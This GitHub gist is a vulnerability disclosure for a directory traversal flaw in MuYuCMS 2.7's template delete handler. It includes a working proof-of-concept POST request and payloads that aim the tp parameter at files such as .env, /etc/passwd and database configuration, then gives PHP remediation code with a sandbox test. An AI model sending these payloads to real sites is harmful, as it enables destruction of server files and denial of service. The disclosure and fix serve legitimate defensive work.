@b1uel0n3
Last active December 10, 2025 01:05
MuYuCMS 2.7 - Template Management Directory Traversal (CVE Request)

MuYuCMS 2.7 Template Management Directory Traversal

Vulnerability Details

  • Product: MuYuCMS
  • Version: 2.7
  • Type: Directory Traversal → Arbitrary File Deletion
  • CVSS: 8.1 High
  • Project URL: https://gitee.com/MuYuCMS/MuYuCMS
  • File: application/admin/controller/Template.php
  • Method: tempdel
  • Parameters: temn, tp

Proof of Concept

POST /admin/template/tempdel HTTP/1.1
Content-Type: application/x-www-form-urlencoded

temn=home_temp&tp=../../../config/database.php

Example Payloads:

tp=../../../.env&temn=home_temp
tp=../../../../etc/passwd&temn=home_temp
tp=../../../application/config.php&temn=home_temp

Impact

  • Delete critical system files (Denial of Service)
  • Remove security configurations (Privilege Escalation)
  • Permanent data loss

Remediation

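// Add path validation before file deletion.
// realpath() resolves "../" and symlinks and returns false when the path does not exist.
$allowed_base = realpath('/template/directory/');
// Validate the exact path that will be deleted (assumed here to be built from temn and tp).
$target_path = realpath($base_path . $temn . '/' . $tp);

// Match on base + separator so a sibling such as /template/directory_old cannot pass.
if ($allowed_base === false || $target_path === false
    || strpos($target_path, $allowed_base . DIRECTORY_SEPARATOR) !== 0) {
    return json(['error' => 'Path traversal detected']);
}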
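
A fuller form of the check above, written as an added example and not taken from MuYuCMS or from this gist's author. The helper name safe_template_path(), the sandbox layout, and the way temn and tp are joined into a path are assumptions. It runs the check against a constructed temporary directory with tp values shaped like the payloads listed earlier.

```php
<?php
// Added example: containment check for a template-file delete handler.
// safe_template_path() and the sandbox layout are hypothetical, not MuYuCMS code.

function safe_template_path(string $templateRoot, string $temn, string $tp): ?string
{
    // The template name is a single directory name, never a path.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $temn)) {
        return null;
    }
    $root = realpath($templateRoot . DIRECTORY_SEPARATOR . $temn);
    if ($root === false || !is_dir($root)) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks; false means "does not exist".
    $target = realpath($root . DIRECTORY_SEPARATOR . $tp);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against root + separator so "home_temp_backup" cannot match "home_temp".
    if (strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed sandbox so the check can be run offline.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . bin2hex(random_bytes(4));
mkdir("$base/template/home_temp", 0700, true);
mkdir("$base/config", 0700, true);
file_put_contents("$base/template/home_temp/index.html", '<h1>demo</h1>');
file_put_contents("$base/config/database.php", '<?php // constructed');

// tp values: one legitimate, the rest shaped like the payloads on this page.
$cases = ['index.html', '../../config/database.php', '../../../../etc/passwd', 'missing.html'];
foreach ($cases as $tp) {
    $path = safe_template_path("$base/template", 'home_temp', $tp);
    if ($path === null) {
        echo "REJECT  tp=$tp\n";      // log and return an error; never call unlink()
    } else {
        unlink($path);
        echo "DELETE  $path\n";
    }
}
// The file outside the template directory must still exist after the run.
echo file_exists("$base/config/database.php") ? "config intact\n" : "config deleted\n";
```

Both the base and the target go through realpath() before comparison, so a symlinked temp or web root does not cause false rejections, and a symlink inside the template directory that points outside it is still refused.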
